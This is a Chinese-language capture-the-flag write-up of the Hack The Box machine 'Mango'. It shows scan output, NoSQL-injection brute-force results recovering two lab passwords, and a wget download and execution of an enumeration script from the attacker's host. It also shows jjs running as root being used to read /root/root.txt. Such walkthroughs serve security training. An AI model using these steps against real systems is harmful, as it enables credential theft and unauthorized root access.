Hack the box - Mango-阿里云开发者社区

Hack the box - Mango

2023-02-14 119

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： Hack the box - Mango

大家好，今天给大家带来的CTF挑战靶机是来自hackthebox的“Mango”，hackthebox是一个非常不错的在线实验平台，能帮助你提升渗透测试技能和黑盒测试技能，平台上有很多靶机，从易到难，各个级别的靶机都有。本级靶机难度为简单级别，任务是找到靶机上的user.txt和root.txt。

摘要

· nosql 注入

· jjs 文件读取

信息收集

nmap扫出了 22 , 80 , 443 端口

root@localhost:~# nmap -sC -sV -p 80,22,443 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:53 CST
Nmap scan report for bogon (10.10.10.162)
Host is up (0.44s latency).
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.83 seconds

80端口的web并没有什么发现访问443，https的 web 弹出证书提示点击错误代码提示，发现证书

证书解密

发现新站点 staging-order.mango.htb

Nosql 注入

发现登录框mango-nosql注入

root@localhost:~/hackthebox_workspace/finish/Mango#./brute.py
h
h3
h3m
h3mX
h3mXK
h3mXK8
h3mXK8R
h3mXK8Rh
h3mXK8RhU
h3mXK8RhU~
h3mXK8RhU~f
h3mXK8RhU~f{
h3mXK8RhU~f{]
h3mXK8RhU~f{]f
h3mXK8RhU~f{]f5
h3mXK8RhU~f{]f5H
\Mango password: h3mXK8RhU~f{]f5H

拿到密码后 ssh 登录，当前权限找不到user.txt，查看 passwd 发现 admin 用户

mango@mango:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mango:x:1000:1000:mango:/home/mango:/bin/bash
admin:x:4000000000:1001:,,,:/home/admin/:/bin/sh
mongodb:x:111:65534::/home/mongodb:/usr/sbin/nologin

nosql 注入获取 admin 账号

root@localhost:~/hackthebox_workspace/finish/Mango#./brute.py
t
t9
t9K
t9Kc
t9KcS
t9KcS3
t9KcS3>
t9KcS3>!
t9KcS3>!0
t9KcS3>!0B
t9KcS3>!0B#
t9KcS3>!0B#2
\Admin password: t9KcS3>!0B#2

切换到 admin 账号，获取user.txt，利用python 和 wget 传输枚举脚本

kali:
root@localhost:~/hackthebox_workspace# python -m SimpleHTTPServer 80
HTB server:
admin@mango:/tmp$ wget http://10.10.xx.xx/LinEnum.sh
admin@mango:/tmp$ chmod +x LinEnum.sh
admin@mango:/tmp$ ./LinEnum.sh

发现了可以用 jjs（java嵌入式javascript引擎脚本工具https://www.runoob.com/java/java8-nashorn-javascript.html）以 root 权限运行

https://gtfobins.github.io/gtfobins/jjs/#file-read

root       1993  0.0  4.0 2577268 82144 pts/1   Tl   05:55   0:02 jjs 
admin@mango:/home/mango$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); }
8a******************************

Hack the box - Mango

热门文章

最新文章

相关电子书